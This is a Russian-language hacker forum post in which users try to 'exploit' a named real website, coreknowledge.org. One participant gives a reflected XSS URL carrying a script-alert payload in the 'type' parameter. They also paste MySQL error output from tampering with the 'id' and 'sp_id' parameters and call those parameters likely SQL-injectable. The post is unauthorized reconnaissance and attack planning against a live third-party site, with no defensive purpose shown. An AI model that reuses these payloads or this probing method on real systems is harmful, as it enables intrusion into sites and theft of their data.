Сообщение от
Br@!ns
↑
Код:
http://www.coreknowledge.org/m'
Помогите раскрутить
В догонку к тому что faza02 написал
Код HTML:
http://www.coreknowledge.org/mimik/mimik_live_data/view.php?id=194&sp_id=4&type=%3Cscript%3Ealert%28%27xss%27%29;%3C/script%3E&q=search
поиск.. id=194 строго, все что отличается от этого скул ошибка и
SQL: SELECT 1 FROM Fields WHERE type='Group Permission' AND table_id=
MySQL_ERROR: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1
параметh sp_id, если оставить пустым - ошибка
SQL: select name from mimik_Standalone_Pages where id =
MySQL_ERROR: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1
Скорее всего тоже можно раскрутить по образу как faza02 написал... параметр type не фильтруется, что в примере выше и показал, ксс отраженная проходит на ура.